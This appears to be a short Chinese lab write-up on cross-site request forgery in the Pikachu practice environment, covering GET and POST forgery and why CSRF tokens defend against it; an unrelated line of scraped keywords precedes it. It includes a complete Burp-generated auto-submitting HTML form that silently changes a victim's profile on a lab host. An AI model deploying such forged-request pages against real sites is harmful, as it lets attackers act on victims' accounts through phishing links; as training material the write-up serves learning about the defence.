国外文本排版设计网站,中国纪检监察报官网,企业建站要多少钱,做pc端网站服务文章目录 CSRF(get)CSRF(post)CSRF Token CSRF(get)
根据提示的用户信息登录 点击修改个人信息 开启bp代理#xff0c;点击submit 拦截到请求数据包 浏览器关闭代理 刷新页面 CSRF(post) 使用BP生成CSRF POC post请求伪造#xff0c;可以通过钓鱼网站#xff0c;诱导用户去… 文章目录 CSRF(get)CSRF(post)CSRF Token CSRF(get)
根据提示的用户信息登录 点击修改个人信息 开启bp代理点击submit 拦截到请求数据包 浏览器关闭代理 刷新页面 CSRF(post) 使用BP生成CSRF POC post请求伪造可以通过钓鱼网站诱导用户去点链接
html!-- CSRF PoC - generated by Burp Suite Professional --bodyform actionhttp://192.168.80.139/pikachu/vul/csrf/csrfpost/csrf_post_edit.php methodPOSTinput typehidden namesex valuewoman /input typehidden namephonenum value110110110 /input typehidden nameadd value北京 /input typehidden nameemail value3123qq.com /input typehidden namesubmit valuesubmit /input typesubmit valueSubmit request //formscripthistory.pushState(, , /);document.forms[0].submit();/script/body
/html CSRF Token
分析一下这个token的作用了。按照前面csrf get的方法攻击者会伪造一个GET URL去让用户点击。但用户正常提供GET请求时会把服务器返回的token填入和提交而攻击者伪造URL时除非前期抓包获取到这个返回的token否则他是不会知道这个token的。所以攻击者无法构造GET URL。同理对于POST方法也是一样。所以使用token是一个很好的防御CSRF攻击的方法。
